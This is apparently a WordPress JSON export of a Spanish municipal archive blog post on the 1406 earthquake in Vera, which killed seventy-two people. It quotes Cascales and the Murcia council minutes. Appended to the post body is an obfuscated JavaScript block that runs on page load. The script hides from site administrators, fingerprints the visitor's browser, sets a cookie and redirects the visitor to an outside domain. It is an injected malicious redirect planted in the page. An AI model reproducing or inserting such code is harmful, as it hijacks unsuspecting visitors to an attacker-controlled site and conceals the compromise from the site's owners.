{"id":278,"date":"2014-11-04T10:55:26","date_gmt":"2014-11-04T10:55:26","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=278"},"modified":"2018-01-15T13:55:55","modified_gmt":"2018-01-15T13:55:55","slug":"1406-noviembre-setenta-y-dos-victimas-el-dia-que-temblo-la-tierra","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/11\/04\/1406-noviembre-setenta-y-dos-victimas-el-dia-que-temblo-la-tierra\/","title":{"rendered":"1406. NOVIEMBRE. SETENTA Y DOS V\u00cdCTIMAS. \u00abEL D\u00cdA QUE TEMBL\u00d3 LA TIERRA\u00bb"},"content":{"rendered":"<p>En Vera se sigue rumoreando, que el terremoto de nueve de noviembre de <b>1518<\/b> fue un <b>castigo divino<\/b> dirigido a los nuevos pobladores, a los cristianos, por haber expulsado a los musulmanes de su vieja Ciudad, la del Cerro del Esp\u00edritu Santo, el 10 de junio de 1488. Notando a priori lo absurdo de esta afirmaci\u00f3n, tanto desde el punto de vista racional como teol\u00f3gico, sirva adem\u00e1s esta descripci\u00f3n del terremoto de 1406 para desmentirlo.<!--more--><\/p>\n<p align=\"justify\"><b>Francisco Cascales<\/b>, escritor murciano, public\u00f3 en <b>1621<\/b> en <i><b>Discursos Hist\u00f3ricos de Murcia y su Reino<\/b><\/i>, que hacia la primera quincena de noviembre de 1406 la Vera musulmana hab\u00eda sufrido los efectos de un terremoto:<\/p>\n<p align=\"justify\">(\u2026) <span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>Lo que result\u00f3 de las Cortes, fue que publicase por toda Castilla guerra contra el Rey de Granada, en raz\u00f3n de lo qual tuvo luego carta del Rey el Mariscal; y la mand\u00f3 pregonar por todo este Reyno, para que todos estuviesen apercibidos: y como toda la tierra ard\u00eda en armas, tras una nueva venia otra. Luego vino ante el <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>Mariscal Jayme Blasco<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, esp\u00eda de Lorca, que hab\u00eda estado en tierra de Moros espiando veinte d\u00edas, y dixo, como en este intermedio <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>tembl\u00f3 la tierra<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, y se cay\u00f3 gran parte del <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>Castillo de Vera<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, y la mitad de la <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>Mezquita de los Moros<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, y un gran pedazo de <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>lienzo<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i> de la muralla de la Villa, y que murieron <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>setenta y dos Moros<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, y sus cavallos, y que sobre esta raz\u00f3n vino all\u00ed <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>Reduan<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, Alguacil mayor del Rey de Granada, con mil y quinientos, y m\u00e1s de a cavallo, y doce mil hombres de a pie, y que se decia, que antes que partiese de Vera, hab\u00eda de correr esta tierra; y que otro Caudillo de Moros estava en Orza encima de los Velez con seiscientos de a cavallo, con el mismo intento de correr esta tierra<\/i><\/span><\/span><span style=\"font-size: medium\">(\u2026)<\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cascales2.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-282\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cascales2-287x300.jpg\" alt=\"cascales2\" width=\"287\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cascales2-287x300.jpg 287w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cascales2.jpg 307w\" sizes=\"(max-width: 287px) 100vw, 287px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\">La fuente de la que extrajo el autor dicha informaci\u00f3n fue el libro de <\/span><span style=\"font-size: medium\"><b>Actas Capitulares del Archivo Municipal de Murcia<\/b><\/span><span style=\"font-size: medium\">, sesi\u00f3n de 25 de noviembre de 1406, folios 126 y 127:<\/span><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\">(\u2026) <\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>A los muchos onrados el con\u00e7ejo e cavalleros e escuderos e ofi\u00e7iales e omes buenos de la muy noble \u00e7ibdat de Murcia, yo <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>Ferrand Gar\u00e7ia de Herrera<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, mariscal de Castiella, vos enbio mucho saludar como aquellos para quien mucho onrra e buena ventura querria e a quien so muy obligado de fazer todas las cosas que a vuestras onrras cunpla. Sabel que ayer lunes en la noche lleg\u00f3 aqu\u00ed Jayme Blasco, <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>alfaqueque<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i> de aqu\u00ed de Lorca, de tierra de moros, que a estado all\u00e1 detenido bien ha ya unos veynte dias e dize por nuevas \u00e7iertas en como el dia que tremia la tierra que se cayo del pie\u00e7a del <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>castiello de Vera e la meytad de la mezquita<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i> de los moros e otro peda\u00e7o del lien\u00e7o de la \u00e7erca de la villa. E es \u00e7ierto que murieron ay <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>setenta e dos moros<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i> e seys cavallos e pares\u00e7e que sobre esta raz\u00f3n es venido ally <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>Rodoan<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, alguacil mayor del rey de Granada, e seg\u00fan dizen por nuevas \u00e7iertas que tiene alli consigo dos mill o dos mill e quinientos de cavallo e que pasan dellos e fasta diez o doce mill omes de pie. E creo bien que antes que partan de ally de Vera querran entrar a esta tierra e aun dize mas este J<\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>ayme Blasco<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i>, que esta otro caudillo de los moros en un lugar que llaman <\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i><b>Or\u00e7a<\/b><\/i><\/span><\/span><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\"><i> aca en\u00e7ima\u00a0 de los Velez, con quinientos o seys\u00e7ientos de cavallo e pues esta gente es llegada a esta frontera en ninguna guisa\u00a0 bien creo que non partiran desta tierra fasta fazer entrada<\/i><\/span><\/span><span style=\"font-size: medium\"> (&#8230;)<\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/definitiva-1-folio-libro-abierto.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-283\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/definitiva-1-folio-libro-abierto-292x300.jpg\" alt=\"definitiva 1 folio libro abierto\" width=\"292\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/definitiva-1-folio-libro-abierto-292x300.jpg 292w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/definitiva-1-folio-libro-abierto-999x1024.jpg 999w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/definitiva-1-folio-libro-abierto.jpg 1410w\" sizes=\"(max-width: 292px) 100vw, 292px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\">Los da\u00f1os que se describen suponen un grado de <b>intensidad de VIII o IX<\/b> en la Escala Sismol\u00f3gica de Magnitud de Momento. Sin embargo, en el relato de la campa\u00f1a de diciembre que hace Cascales, no se hace menci\u00f3n a destrucci\u00f3n alguna en la ciudad de Vera:<\/span><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\">(\u2026) <span style=\"font-family: Times New Roman\"><i>Los Christianos que se hallaron en esta entrada fueron ochenta hombres de armas, y quinientos ginetes, y tres mil peones de lanza, y ballesta. Estavan los Moros bien apercibidos, porque hab\u00eda tres dias que tenian noticia de la gente que se juntava contra ellos: supo el Mariscal, que los Moros que estavan dentro de Vera eran <\/i><\/span><span style=\"font-family: Times New Roman\"><i><b>trescientos de a cavallo<\/b><\/i><\/span><span style=\"font-family: Times New Roman\"><i>, y mil peones, y pensando que pues habian osado aguardar, que osarian tambien escaramuzar, form\u00f3 su esquadron, esperando la batalla; pero los Moros se estuvieron quedos, y quando el Mariscal vi\u00f3, que no querian pelear con \u00e9l, asent\u00f3 su real en unas guertas, y parrales cerca de la Villa, y luego mand\u00f3 <\/i><\/span><span style=\"font-family: Times New Roman\"><i><b>talarlo todo<\/b><\/i><\/span><span style=\"font-family: Times New Roman\"><i>, romper los <\/i><\/span><span style=\"font-family: Times New Roman\"><i><b>molinos<\/b><\/i><\/span><span style=\"font-family: Times New Roman\"><i>, y quemar <\/i><\/span><span style=\"font-family: Times New Roman\"><i><b>cincuenta casas<\/b><\/i><\/span><span style=\"font-family: Times New Roman\"><i> que en contorno habia. Hecho esto, el Mariscal, y los Cavalleros de mas consejo que con \u00e9l estavan, acordaron de combatir la Villa, y combatieronla <\/i><\/span><span style=\"font-family: Times New Roman\"><i><b>por tres puertas que tiene<\/b><\/i><\/span><span style=\"font-family: Times New Roman\"><i>\u2026, y el combate dur\u00f3 desde las nueve de la ma\u00f1ana, hasta el Sol puesto, y combatieron tan fuertemente, que si llevaran escalas (aunque la Villa estava con mucha guarnicion de gente) todav\u00eda se entrara por fuerza de armas<\/i><\/span><i> <\/i>(&#8230;)<\/span><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\">Al no tener noticias sobre los da\u00f1os de la muralla, se entiende que sus efectos no debieron de ser muy graves para sus estructuras de defensa, no as\u00ed para las setenta y dos v\u00edctimas que perecieron durante el temblor.<\/span><\/p>\n<p align=\"right\"><span style=\"font-size: medium\">Manuel Caparr\u00f3s Perales<\/span><\/p>\n<p align=\"right\"><span style=\"font-size: medium\">Archivero Municipal de Vera<\/span><\/p>\n<p align=\"right\"><span style=\"font-size: medium\">10-04-14<\/span><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\">BIBLIOGRAF\u00cdA:<\/span><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\">IBARG\u00dcEN, Jos\u00e9. <i>El terremoto del a\u00f1o 1406 en Vera (Almer\u00eda)<\/i>. Instituto Geogr\u00e1fico Nacional.<\/span><\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En Vera se sigue rumoreando, que el terremoto de nueve de noviembre de 1518 fue un castigo divino dirigido a los nuevos pobladores, a los cristianos, por haber expulsado a los musulmanes de su vieja Ciudad, la del Cerro del Esp\u00edritu Santo, el 10 de junio de 1488. Notando a priori lo absurdo de esta &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/11\/04\/1406-noviembre-setenta-y-dos-victimas-el-dia-que-temblo-la-tierra\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">1406. NOVIEMBRE. SETENTA Y DOS V\u00cdCTIMAS. \u00abEL D\u00cdA QUE TEMBL\u00d3 LA TIERRA\u00bb<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":281,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[14,275],"class_list":["post-278","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-archivo","tag-historia","tag-s-xv"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=278"}],"version-history":[{"count":8,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/278\/revisions"}],"predecessor-version":[{"id":3437,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/278\/revisions\/3437"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/281"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}